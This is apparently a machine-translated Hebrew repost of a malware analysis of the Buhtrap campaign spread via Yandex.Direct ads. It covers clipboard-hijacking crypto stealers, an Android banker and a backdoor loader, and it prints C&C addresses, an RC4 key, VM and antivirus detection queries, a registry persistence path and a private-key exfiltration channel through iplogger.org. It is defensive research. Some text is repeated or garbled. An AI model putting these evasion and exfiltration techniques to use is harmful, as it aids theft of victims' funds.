ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื•ืžืฆืคื™ืŸ Buhtrap ื”ื•ืคืฆื• ื‘ืืžืฆืขื•ืช Yandex.Direct

ื ืชื•ื ื™ ืงื•ื‘ืฅ ื”ืžืงื•ืจ ื‘ืชื•ืกืคืช ืขืจืš ื”ืงืกื VEGA ืžื•ืฆืคื ื™ื ืœ-0x5000 ื‘ืชื™ื ื”ืจืืฉื•ื ื™ื. ื›ืœ ืžื™ื“ืข ื”ืคืขื ื•ื— ืžืฆื•ืจืฃ ืœืงื•ื‘ืฅ ื‘ืขืœ ื”ืžื‘ื ื” ื”ื‘ื:

ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื•ืžืฆืคื™ืŸ Buhtrap ื”ื•ืคืฆื• ื‘ืืžืฆืขื•ืช Yandex.Direct

- ืกืžืŸ ื’ื•ื“ืœ ื”ืงื•ื‘ืฅ ืžื›ื™ืœ ืกื™ืžื•ืŸ ื”ืžืฆื™ื™ืŸ ืื ื”ืงื•ื‘ืฅ ื’ื“ื•ืœ ืž-0x5000 ื‘ืชื™ื
โ€” AES key blob = ZlibCompress(RSAencrypt(AES key + IV, ืžืคืชื— ืฆื™ื‘ื•ืจื™ ืฉืœ ื–ื•ื’ ืžืคืชื—ื•ืช RSA ืฉื ื•ืฆืจ))
- RSA key blob = ZlibCompress(RSAencrypt(ืžืคืชื— RSA ืคืจื˜ื™ ืฉื ื•ืฆืจ, ืžืคืชื— RSA ืฆื™ื‘ื•ืจื™ ืžืงื•ื“ื“ ืงืฉื”))

Win32/ClipBanker

Win32/ClipBanker ื”ื•ื ืจื›ื™ื‘ ืฉื”ื•ืคืฅ ืœืกื™ืจื•ื’ื™ืŸ ืžืกื•ืฃ ืื•ืงื˜ื•ื‘ืจ ืขื“ ืชื—ื™ืœืช ื“ืฆืžื‘ืจ 2018. ืชืคืงื™ื“ื• ืœืคืงื— ืขืœ ืชื•ื›ืŸ ื”ืœื•ื—, ื”ื•ื ืžื—ืคืฉ ื›ืชื•ื‘ื•ืช ืฉืœ ืืจื ืงื™ cryptocurrency. ืœืื—ืจ ืฉืงื‘ืข ืืช ื›ืชื•ื‘ืช ื”ื™ืขื“ ืฉืœ ืืจื ืง, ClipBanker ืžื—ืœื™ืฃ ืื•ืชื” ื‘ื›ืชื•ื‘ืช ืฉืœื“ืขืชื” ืฉื™ื™ื›ืช ืœืžืคืขื™ืœื™ื. ื”ื“ื’ื™ืžื•ืช ืฉื‘ื“ืงื ื• ืœื ื”ื™ื• ืืจื•ื–ื•ืช ื•ืœื ืžืขื•ืจืคืœื•ืช. ื”ืžื ื’ื ื•ืŸ ื”ื™ื—ื™ื“ ื”ืžืฉืžืฉ ืœื”ืกื•ื•ืช ื”ืชื ื”ื’ื•ืช ื”ื•ื ื”ืฆืคื ืช ืžื—ืจื•ื–ืช. ื›ืชื•ื‘ื•ืช ืืจื ืง ื”ืžืคืขื™ืœ ืžื•ืฆืคื ื•ืช ื‘ืืžืฆืขื•ืช RC4. ืžื˜ื‘ืขื•ืช ืงืจื™ืคื˜ื•ื’ืจืคื™ื™ื ื”ื™ืขื“ ื”ื ื‘ื™ื˜ืงื•ื™ืŸ, ื‘ื™ื˜ืงื•ื™ืŸ ืžื–ื•ืžืŸ, Dogecoin, Ethereum ื•-Ripple.

ื‘ืžื”ืœืš ื”ืชืงื•ืคื” ืฉื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช ื”ืชืคืฉื˜ื” ืœืืจื ืงื™ ื”ื‘ื™ื˜ืงื•ื™ืŸ ืฉืœ ื”ืชื•ืงืคื™ื, ื ืฉืœื—ื” ื›ืžื•ืช ืงื˜ื ื” ืœ-VTS, ืžื” ืฉืžื˜ื™ืœ ืกืคืง ื‘ื”ืฆืœื—ืช ื”ืงืžืคื™ื™ืŸ. ื‘ื ื•ืกืฃ, ืื™ืŸ ืจืื™ื•ืช ื”ืžืฆื‘ื™ืขื•ืช ืขืœ ื›ืš ืฉืขืกืงืื•ืช ืืœื• ื”ื™ื• ืงืฉื•ืจื•ืช ืœ-ClipBanker ื‘ื›ืœืœ.

Win32/RTM

ืจื›ื™ื‘ Win32/RTM ื”ื•ืคืฅ ื‘ืžืฉืš ืžืกืคืจ ื™ืžื™ื ื‘ืชื—ื™ืœืช ืžืจืฅ 2019. RTM ื”ื•ื ื‘ื ืงืื™ ื˜ืจื•ื™ืื ื™ ืฉื ื›ืชื‘ ื‘ื“ืœืคื™, ื”ืžื›ื•ื•ืŸ ืœืžืขืจื›ื•ืช ื‘ื ืงืื•ืช ืžืจื•ื—ืงื•ืช. ื‘ืฉื ืช 2017 ืคืจืกืžื• ื—ื•ืงืจื™ ESET ื ื™ืชื•ื— ืžืคื•ืจื˜ ืฉืœ ืชื•ื›ื ื™ืช ื–ื•, ื”ืชื™ืื•ืจ ืขื“ื™ื™ืŸ ืจืœื•ื•ื ื˜ื™. ื‘ื™ื ื•ืืจ 2019, Palo Alto Networks ื™ืฆืื” ื’ื ื”ื™ื ืคื•ืกื˜ ื‘ื‘ืœื•ื’ ืขืœ RTM.

ืžืขืžื™ืก Buhtrap

ื‘ืžืฉืš ื–ืžืŸ ืžื”, ื”ื•ืจื“ื” ื”ื™ื” ื–ืžื™ืŸ ื‘-GitHub ืฉืœื ื”ื™ื” ื“ื•ืžื” ืœื›ืœื™ Buhtrap ื”ืงื•ื“ืžื™ื. ื”ื•ื ืคื•ื ื” ืืœ https://94.100.18[.]67/RSS.php?<some_id> ื›ื“ื™ ืœืงื‘ืœ ืืช ื”ืฉืœื‘ ื”ื‘ื ื•ืœื˜ืขื•ืŸ ืื•ืชื• ื™ืฉื™ืจื•ืช ืœื–ื™ื›ืจื•ืŸ. ืื ื• ื™ื›ื•ืœื™ื ืœื”ื‘ื—ื™ืŸ ื‘ื™ืŸ ืฉืชื™ ื”ืชื ื”ื’ื•ื™ื•ืช ืฉืœ ืงื•ื“ ื”ืฉืœื‘ ื”ืฉื ื™. ื‘ื›ืชื•ื‘ืช ื”-URL ื”ืจืืฉื•ื ื”, RSS.php ืขื‘ืจ ื™ืฉื™ืจื•ืช ืืช ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ืฉืœ Buhtrap - ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื”ื–ื• ื“ื•ืžื” ืžืื•ื“ ืœื–ื• ื”ื–ืžื™ื ื” ืœืื—ืจ ื“ืœืฃ ืงื•ื“ ื”ืžืงื•ืจ.

ื‘ืื•ืคืŸ ืžืขื ื™ื™ืŸ, ืื ื• ืจื•ืื™ื ืžืกืคืจ ืงืžืคื™ื™ื ื™ื ืขื ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ืฉืœ Buhtrap, ื•ื”ื ืžื ื•ื”ืœื™ื ืœื›ืื•ืจื” ืขืœ ื™ื“ื™ ืžืคืขื™ืœื™ื ืฉื•ื ื™ื. ื‘ืžืงืจื” ื–ื”, ื”ื”ื‘ื“ืœ ื”ืขื™ืงืจื™ ื”ื•ื ืฉื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื ื˜ืขื ืช ื™ืฉื™ืจื•ืช ืœื–ื™ื›ืจื•ืŸ ื•ืื™ื ื” ืžืฉืชืžืฉืช ื‘ืกื›ื™ืžื” ื”ืจื’ื™ืœื” ืขื ืชื”ืœื™ืš ืคืจื™ืกืช ื”-DLL ืฉืขืœื™ื• ื“ื™ื‘ืจื ื• ืœืคื ื™. ื‘ื ื•ืกืฃ, ื”ืžืคืขื™ืœื™ื ืฉื™ื ื• ืืช ืžืคืชื— RC4 ื”ืžืฉืžืฉ ืœื”ืฆืคื ืช ืชืขื‘ื•ืจืช ืจืฉืช ืœืฉืจืช C&C. ื‘ืจื•ื‘ ื”ืงืžืคื™ื™ื ื™ื ืฉืจืื™ื ื•, ื”ืžืคืขื™ืœื™ื ืœื ื˜ืจื—ื• ืœืฉื ื•ืช ืืช ื”ืžืคืชื— ื”ื–ื”.

ื”ื”ืชื ื”ื’ื•ืช ื”ืฉื ื™ื™ื” ื•ื”ืžื•ืจื›ื‘ืช ื™ื•ืชืจ ื”ื™ื™ืชื” ืฉื›ืชื•ื‘ืช ื”-URL ืฉืœ RSS.php ื”ื•ืขื‘ืจื” ืœื˜ื•ืขืŸ ืื—ืจ. ื”ื•ื ื”ื˜ืžื™ืข ืžืขื˜ ืขืจืคื•ืœ, ื›ื’ื•ืŸ ื‘ื ื™ื™ื” ืžื—ื“ืฉ ืฉืœ ื˜ื‘ืœืช ื”ื™ื™ื‘ื•ื โ€‹โ€‹ื”ื“ื™ื ืžื™. ืžื˜ืจืช ื˜ื•ืขืŸ ื”ืืชื—ื•ืœ ื”ื™ื ืœื™ืฆื•ืจ ืงืฉืจ ืขื ืฉืจืช C&C msiofficeupd[.]com/api/F27F84EDA4D13B15/2, ืฉืœื— ืืช ื”ื™ื•ืžื ื™ื ื•ื”ืžืชืŸ ืœืชื’ื•ื‘ื”. ื”ื•ื ืžืขื‘ื“ ืืช ื”ืชื’ื•ื‘ื” ื›ื’ื•ืฉ, ื˜ื•ืขืŸ ืื•ืชื” ืœื–ื™ื›ืจื•ืŸ ื•ืžื‘ืฆืข ืื•ืชื”. ื”ืžื˜ืขืŸ ืฉืจืื™ื ื• ืžื‘ืฆืข ืืช ื”ืžืขืžื™ืก ื”ื–ื” ื”ื™ื” ืื•ืชื” ื“ืœืช ืื—ื•ืจื™ืช ืฉืœ Buhtrap, ืื‘ืœ ื™ื™ืชื›ืŸ ืฉื™ืฉ ืจื›ื™ื‘ื™ื ืื—ืจื™ื.

ืื ื“ืจื•ืื™ื“/Spy.Banker

ืžืขื ื™ื™ืŸ ืœืฆื™ื™ืŸ ืฉื’ื ืจื›ื™ื‘ ืขื‘ื•ืจ ืื ื“ืจื•ืื™ื“ ื ืžืฆื ื‘ืžืื’ืจ GitHub. ื”ื•ื ื”ื™ื” ื‘ืกื ื™ืฃ ื”ืจืืฉื™ ืจืง ื™ื•ื ืื—ื“ - 1 ื‘ื ื•ื‘ืžื‘ืจ 2018. ืžืœื‘ื“ ืคืจืกื•ื ื‘-GitHub, ESET telemetry ืœื ืžื•ืฆื ืขื“ื•ืช ืœื”ืคืฆืช ืชื•ื›ื ื” ื–ื“ื•ื ื™ืช ื–ื•.

ื”ืจื›ื™ื‘ ื”ืชืืจื— ื›ื—ื‘ื™ืœืช ื™ื™ืฉื•ืžื™ ืื ื“ืจื•ืื™ื“ (APK). ื–ื” ืžืขื•ืจืคืœ ืžืื•ื“. ื”ื”ืชื ื”ื’ื•ืช ื”ื–ื“ื•ื ื™ืช ืžื•ืกืชืจืช ื‘-JAR ืžื•ืฆืคืŸ ืฉื ืžืฆื ื‘-APK. ื”ื•ื ืžื•ืฆืคืŸ ืขื RC4 ื‘ืืžืฆืขื•ืช ืžืคืชื— ื–ื”:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

ืื•ืชื ืžืคืชื— ื•ืืœื’ื•ืจื™ืชื ืžืฉืžืฉื™ื ืœื”ืฆืคื ืช ืžื—ืจื•ื–ื•ืช. JAR ืžืžื•ืงื ื‘ APK_ROOT + image/files. 4 ื”ื‘ืชื™ื ื”ืจืืฉื•ื ื™ื ืฉืœ ื”ืงื•ื‘ืฅ ืžื›ื™ืœื™ื ืืช ืื•ืจืš ื”-JAR ื”ืžื•ืฆืคืŸ, ืฉืžืชื—ื™ืœ ืžื™ื“ ืื—ืจื™ ืฉื“ื” ื”ืื•ืจืš.

ืœืื—ืจ ืคืขื ื•ื— ื”ืงื•ื‘ืฅ, ื’ื™ืœื™ื ื• ืฉื–ื” ื”ื™ื” ืื ื•ื‘ื™ืก - ื‘ืขื‘ืจ ืžึฐืชื•ึนืขึธื“ ื‘ื ืงืื™ ืœืื ื“ืจื•ืื™ื“. ืœืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช ื™ืฉ ืืช ื”ืชื›ื•ื ื•ืช ื”ื‘ืื•ืช:

  • ื”ืงืœื˜ืช ืžื™ืงืจื•ืคื•ืŸ
  • ืฆื™ืœื•ื ืžืกืš
  • ืงื‘ืœืช ืงื•ืื•ืจื“ื™ื ื˜ื•ืช GPS
  • keylogger
  • ื”ืฆืคื ืช ื ืชื•ื ื™ ื”ืžื›ืฉื™ืจ ื•ื“ืจื™ืฉืช ื›ื•ืคืจ
  • ืฉืœื™ื—ืช ื“ื•ืืจ ื–ื‘ืœ

ืžืขื ื™ื™ืŸ ืฉื”ื‘ื ืงืื™ ื”ืฉืชืžืฉ ื‘ื˜ื•ื•ื™ื˜ืจ ื›ืขืจื•ืฅ ืชืงืฉื•ืจืช ื’ื™ื‘ื•ื™ ื›ื“ื™ ืœื”ืฉื™ื’ ืฉืจืช C&C ืื—ืจ. ื”ืžื“ื’ื ืฉื ื™ืชื—ื ื• ื”ืฉืชืžืฉ ื‘ื—ืฉื‘ื•ืŸ @JonesTrader, ืืš ื‘ื–ืžืŸ ื”ื ื™ืชื•ื— ื”ื•ื ื›ื‘ืจ ื”ื™ื” ื—ืกื•ื.

ื”ื‘ื ืงืื™ ืžื›ื™ืœ ืจืฉื™ืžื” ืฉืœ ื™ื™ืฉื•ืžื™ ื™ืขื“ ื‘ืžื›ืฉื™ืจ ื”ืื ื“ืจื•ืื™ื“. ื”ื™ื ืืจื•ื›ื” ืžื”ืจืฉื™ืžื” ืฉื”ืชืงื‘ืœื” ื‘ืžื—ืงืจ ืฉืœ ืกื•ืคื•ืก. ื”ืจืฉื™ืžื” ื›ื•ืœืœืช ืืคืœื™ืงืฆื™ื•ืช ื‘ื ืงืื™ื•ืช ืจื‘ื•ืช, ืชื•ื›ื ื™ื•ืช ืงื ื™ื•ืช ืžืงื•ื•ื ื•ืช ื›ืžื• ืืžื–ื•ืŸ ื•-eBay ื•ืฉื™ืจื•ืชื™ ืžื˜ื‘ืขื•ืช ืงืจื™ืคื˜ื•ื’ืจืคื™ื™ื.

MSIL/ClipBanker.IH

ื”ืจื›ื™ื‘ ื”ืื—ืจื•ืŸ ืฉื”ื•ืคืฅ ื›ื—ืœืง ืžืžืกืข ืคืจืกื•ื ื–ื” ื”ื™ื” ืงื•ื‘ืฅ ื”ื”ืคืขืœื” ืฉืœ .NET Windows, ืฉื”ื•ืคื™ืข ื‘ืžืจืฅ 2019. ืจื•ื‘ ื”ื’ืจืกืื•ืช ืฉื ื—ืงืจื• ื ืืจื–ื• ืขื ConfuserEx v1.0.0. ื›ืžื• ClipBanker, ืจื›ื™ื‘ ื–ื” ืžืฉืชืžืฉ ื‘ืœื•ื—. ื”ืžื˜ืจื” ืฉืœื• ื”ื™ื ืžื’ื•ื•ืŸ ืจื—ื‘ ืฉืœ ืžื˜ื‘ืขื•ืช ืงืจื™ืคื˜ื•ื’ืจืคื™ื™ื, ื›ืžื• ื’ื ื”ืฆืขื•ืช ื‘-Steam. ื‘ื ื•ืกืฃ, ื”ื•ื ืžืฉืชืžืฉ ื‘ืฉื™ืจื•ืช IP Logger ื›ื“ื™ ืœื’ื ื•ื‘ ืืช ืžืคืชื— ื”-WIF ื”ืคืจื˜ื™ ืฉืœ ื‘ื™ื˜ืงื•ื™ืŸ.

ืžื ื’ื ื•ื ื™ ื”ื’ื ื”
ื‘ื ื•ืกืฃ ืœื™ืชืจื•ื ื•ืช ืฉ-ConfuserEx ืžืกืคืงืช ื‘ืžื ื™ืขืช ืื™ืชื•ืจ ื‘ืื’ื™ื, ื”ืฉืœื›ื” ื•ื”ืชืขืกืงื•ืช, ื”ืจื›ื™ื‘ ื›ื•ืœืœ ืืช ื”ื™ื›ื•ืœืช ืœื–ื”ื•ืช ืžื•ืฆืจื™ ืื ื˜ื™-ื•ื™ืจื•ืก ื•ืžื›ื•ื ื•ืช ื•ื™ืจื˜ื•ืืœื™ื•ืช.

ื›ื“ื™ ืœื•ื•ื“ื ืฉื”ื•ื ืคื•ืขืœ ื‘ืžื›ื•ื ื” ื•ื™ืจื˜ื•ืืœื™ืช, ื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช ืžืฉืชืžืฉืช ื‘ืฉื•ืจืช ื”ืคืงื•ื“ื” ื”ืžื•ื‘ื ื™ืช ืฉืœ Windows WMI (WMIC) ื›ื“ื™ ืœื‘ืงืฉ ืžื™ื“ืข BIOS, ื›ืœื•ืžืจ:

wmic bios

ืœืื—ืจ ืžื›ืŸ ื”ืชื•ื›ื ื™ืช ืžื ืชื—ืช ืืช ืคืœื˜ ื”ืคืงื•ื“ื” ื•ืžื—ืคืฉืช ืžื™ืœื•ืช ืžืคืชื—: VBOX, VirtualBox, XEN, qemu, bochs, VM.

ื›ื“ื™ ืœื–ื”ื•ืช ืžื•ืฆืจื™ ืื ื˜ื™-ื•ื™ืจื•ืก, ืชื•ื›ื ื” ื–ื“ื•ื ื™ืช ืฉื•ืœื—ืช ื‘ืงืฉื” ืœ-Windows Management Instrumentation (WMI) ืœืžืจื›ื– ื”ืื‘ื˜ื—ื” ืฉืœ Windows ื‘ืืžืฆืขื•ืช ManagementObjectSearcher API ื›ืคื™ ืฉืžื•ืฆื’ ืœื”ืœืŸ. ืœืื—ืจ ืคืขื ื•ื— ืž-base64 ื”ืฉื™ื—ื” ื ืจืื™ืช ื›ืš:

ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')

ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื•ืžืฆืคื™ืŸ Buhtrap ื”ื•ืคืฆื• ื‘ืืžืฆืขื•ืช Yandex.Direct
ืื™ื•ืจ 3. ืชื”ืœื™ืš ื–ื™ื”ื•ื™ ืžื•ืฆืจื™ ืื ื˜ื™ ื•ื™ืจื•ืก.

ื‘ื ื•ืกืฃ, ื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช ื‘ื•ื“ืงืช ืื CryptoClipWatcher, ื›ืœื™ ืœื”ื’ื ื” ืžืคื ื™ ื”ืชืงืคื•ืช ืœื•ื—, ื•ืื ื”ื•ื ืคื•ืขืœ, ืžืฉืขื” ืืช ื›ืœ ื”ืฉืจืฉื•ืจื™ื ื‘ืชื”ืœื™ืš ื–ื”, ื•ื‘ื›ืš ืžืฉื‘ื™ืช ืืช ื”ื”ื’ื ื”.

ื”ึทืชืžึธื“ึธื”

ื’ืจืกืช ื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช ืฉื—ืงืจื ื• ืžืขืชื™ืงื” ืืช ืขืฆืžื” ืœืชื•ื›ื” %APPDATA%googleupdater.exe ื•ืžื’ื“ื™ืจ ืืช ื”ืชื›ื•ื ื” "ื ืกืชืจ" ืขื‘ื•ืจ ืกืคืจื™ื™ืช ื’ื•ื’ืœ. ื•ืื– ื”ื™ื ืžืฉื ื” ืืช ื”ืขืจืš SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell ื‘ืจื™ืฉื•ื ืฉืœ Windows ื•ืžื•ืกื™ืฃ ืืช ื”ื ืชื™ื‘ updater.exe. ื‘ื“ืจืš ื–ื•, ื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช ืชื•ืคืขืœ ื‘ื›ืœ ืคืขื ืฉื”ืžืฉืชืžืฉ ืžืชื—ื‘ืจ.

ื”ืชื ื”ื’ื•ืช ื–ื“ื•ื ื™ืช

ื‘ื“ื•ืžื” ืœ-ClipBanker, ื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช ืขื•ืงื‘ืช ืื—ืจ ืชื•ื›ืŸ ื”ืœื•ื— ื•ืžื—ืคืฉืช ื›ืชื•ื‘ื•ืช ืฉืœ ืืจื ืง ืงืจื™ืคื˜ื•, ื•ื›ืืฉืจ ื”ื™ื ื ืžืฆืืช, ืžื—ืœื™ืคื” ืื•ืชื” ื‘ืื—ืช ืžื›ืชื•ื‘ื•ืช ื”ืžืคืขื™ืœ. ืœื”ืœืŸ ืจืฉื™ืžื” ืฉืœ ื›ืชื•ื‘ื•ืช ื™ืขื“ ื”ืžื‘ื•ืกืกื•ืช ืขืœ ืžื” ืฉื ืžืฆื ื‘ืงื•ื“.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

ืœื›ืœ ืกื•ื’ ื›ืชื•ื‘ืช ื™ืฉ ื‘ื™ื˜ื•ื™ ืจื’ื•ืœืจื™ ืžืชืื™ื. ื”ืขืจืš STEAM_URL ืžืฉืžืฉ ื›ื“ื™ ืœืชืงื•ืฃ ืืช ืžืขืจื›ืช Steam, ื›ืคื™ ืฉื ื™ืชืŸ ืœืจืื•ืช ืžื”ื‘ื™ื˜ื•ื™ ื”ืจื’ื•ืœืจื™ ื”ืžืฉืžืฉ ืœื”ื’ื“ืจื” ื‘ืžืื’ืจ:

b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b

ืขืจื•ืฅ ืกื™ื ื•ืŸ

ื‘ื ื•ืกืฃ ืœื”ื—ืœืคืช ื›ืชื•ื‘ื•ืช ื‘ืžืื’ืจ, ื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช ืžื›ื•ื•ื ืช ืœืžืคืชื—ื•ืช ื”-WIF ื”ืคืจื˜ื™ื™ื ืฉืœ ืืจื ืงื™ Bitcoin, Bitcoin Core ื•-Electrum Bitcoin. ื”ืชื•ื›ื ื™ืช ืžืฉืชืžืฉืช ื‘-plogger.org ื›ืขืจื•ืฅ ืกื™ื ื•ืŸ ื›ื“ื™ ืœื”ืฉื™ื’ ืืช ื”ืžืคืชื— ื”ืคืจื˜ื™ ืฉืœ WIF. ืœืฉื ื›ืš, ืื•ืคืจื˜ื•ืจื™ื ืžื•ืกื™ืคื™ื ื ืชื•ื ื™ ืžืคืชื— ืคืจื˜ื™ ืœื›ื•ืชืจืช User-Agent HTTP, ื›ืคื™ ืฉืžื•ืฆื’ ืœื”ืœืŸ.

ื”ื“ืœืช ื”ืื—ื•ืจื™ืช ื•ืžืฆืคื™ืŸ Buhtrap ื”ื•ืคืฆื• ื‘ืืžืฆืขื•ืช Yandex.Direct
ืื™ื•ืจ 4. ืงื•ื ืกื•ืœืช IP ืœื•ื’ืจ ืขื ื ืชื•ื ื™ ืคืœื˜.

ื”ืžืคืขื™ืœื™ื ืœื ื”ืฉืชืžืฉื• ื‘-iplogger.org ื›ื“ื™ ืœืกื ืŸ ืืจื ืงื™ื. ื”ื ื›ื ืจืื” ื ืงื˜ื• ื‘ืฉื™ื˜ื” ืื—ืจืช ื‘ื’ืœืœ ืžื’ื‘ืœืช 255 ื”ืชื•ื•ื™ื ื‘ืฉื˜ื— User-Agentืžื•ืฆื’ ื‘ืžืžืฉืง ื”ืื™ื ื˜ืจื ื˜ ืฉืœ IP Logger. ื‘ื“ื•ื’ืžืื•ืช ืฉืœืžื“ื ื•, ืฉืจืช ื”ืคืœื˜ ื”ืฉื ื™ ื ืฉืžืจ ื‘ืžืฉืชื ื” ื”ืกื‘ื™ื‘ื” DiscordWebHook. ื‘ืื•ืคืŸ ืžืคืชื™ืข, ืžืฉืชื ื” ืกื‘ื™ื‘ื” ื–ื” ืื™ื ื• ืžื•ืงืฆื” ื‘ืฉื•ื ืžืงื•ื ื‘ืงื•ื“. ื–ื” ืžืฆื‘ื™ืข ืขืœ ื›ืš ืฉื”ืชื•ื›ื ื” ื”ื–ื“ื•ื ื™ืช ืขื“ื™ื™ืŸ ื‘ืคื™ืชื•ื— ื•ื”ืžืฉืชื ื” ืžื•ืงืฆื” ืœืžื›ื•ื ืช ื”ื‘ื“ื™ืงื” ืฉืœ ื”ืžืคืขื™ืœ.

ื™ืฉ ืขื•ื“ ืกื™ืžืŸ ืœื›ืš ืฉื”ืชื•ื›ื ื™ืช ื‘ืคื™ืชื•ื—. ื”ืงื•ื‘ืฅ ื”ื‘ื™ื ืืจื™ ื›ื•ืœืœ ืฉืชื™ ื›ืชื•ื‘ื•ืช URL ืฉืœ iplogger.org, ื•ืฉื ื™ื”ื ื ืฉืืœื™ื ื›ืืฉืจ ื ืชื•ื ื™ื ืขื•ื‘ืจื™ื ืกื™ื ื•ืŸ. ื‘ื‘ืงืฉื” ืœืื—ืช ืžื›ืชื•ื‘ื•ืช ื”ืืชืจื™ื ื”ืœืœื•, ืœืคื ื™ ื”ืขืจืš ื‘ืฉื“ื” Referer ื™ืฉ "DEV /". ืžืฆืื ื• ื’ื ื’ืจืกื” ืฉืœื ืืจื•ื–ื” ื‘ืืžืฆืขื•ืช ConfuserEx, ื”ื ืžืขืŸ ืฉืœ ื›ืชื•ื‘ืช ื”ืืชืจ ื”ื–ื• ื ืงืจื DevFeedbackUrl. ื‘ื”ืชื‘ืกืก ืขืœ ืฉื ืžืฉืชื ื” ื”ืกื‘ื™ื‘ื”, ืื ื• ืžืืžื™ื ื™ื ืฉื”ืžืคืขื™ืœื™ื ืžืชื›ื ื ื™ื ืœื”ืฉืชืžืฉ ื‘ืฉื™ืจื•ืช ื”ืœื’ื™ื˜ื™ืžื™ Discord ื•ื‘ืžืขืจื›ืช ื™ื™ืจื•ื˜ ื”ืื™ื ื˜ืจื ื˜ ืฉืœื• ื›ื“ื™ ืœื’ื ื•ื‘ ืืจื ืงื™ื ืฉืœ ืžื˜ื‘ืขื•ืช ืงืจื™ืคื˜ื•ื’ืจืคื™ื™ื.

ืžืกืงื ื”

ืงืžืคื™ื™ืŸ ื–ื” ื”ื•ื ื“ื•ื’ืžื” ืœืฉื™ืžื•ืฉ ื‘ืฉื™ืจื•ืชื™ ืคืจืกื•ื ืœื’ื™ื˜ื™ืžื™ื™ื ื‘ื”ืชืงืคื•ืช ืกื™ื™ื‘ืจ. ื”ืชื•ื›ื ื™ืช ืžื›ื•ื•ื ืช ืœืืจื’ื•ื ื™ื ืจื•ืกื™ื™ื, ืืš ืœื ื ืชืคืœื ืœืจืื•ืช ืžืชืงืคื” ื›ื–ื• ื‘ืืžืฆืขื•ืช ืฉื™ืจื•ืชื™ื ืฉืื™ื ื ืจื•ืกื™ื. ื›ื“ื™ ืœืžื ื•ืข ืคืฉืจื”, ื”ืžืฉืชืžืฉื™ื ื—ื™ื™ื‘ื™ื ืœื”ื™ื•ืช ื‘ื˜ื•ื—ื™ื ื‘ืžื•ื ื™ื˜ื™ืŸ ืฉืœ ืžืงื•ืจ ื”ืชื•ื›ื ื” ืฉื”ื ืžื•ืจื™ื“ื™ื.

ืจืฉื™ืžื” ืžืœืื” ืฉืœ ืื™ื ื“ื™ืงื˜ื•ืจื™ื ืฉืœ ืคืฉืจื” ื•ืชื›ื•ื ื•ืช MITER ATT&CK ื–ืžื™ื ื” ื‘ื›ืชื•ื‘ืช ืงืฉืจ.

ืžืงื•ืจ: www.habr.com

ื”ื•ืกืคืช ืชื’ื•ื‘ื”